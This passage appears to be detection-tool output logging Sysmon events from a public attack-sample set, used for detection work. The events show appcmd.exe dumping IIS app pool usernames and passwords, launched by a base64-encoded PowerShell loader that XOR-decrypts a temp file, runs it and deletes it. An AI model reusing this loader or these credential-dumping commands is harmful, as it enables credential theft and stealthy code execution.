GkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2524 | PGUID: 365ABB72-3D6E-5CEB-0000-0010CC8AFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.282 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3144 | PGUID: 365ABB72-3D6E-5CEB-0000-00108C8EFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.352 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3100 | PGUID: 365ABB72-3D6E-5CEB-0000-00104C92FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.432 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3136 | PGUID: 365ABB72-3D6E-5CEB-0000-00100C96FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.522 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 344 | PGUID: 365ABB72-3D6E-5CEB-0000-0010CC99FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.662 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3756 | PGUID: 365ABB72-3D6E-5CEB-0000-0010EF9EFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.742 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 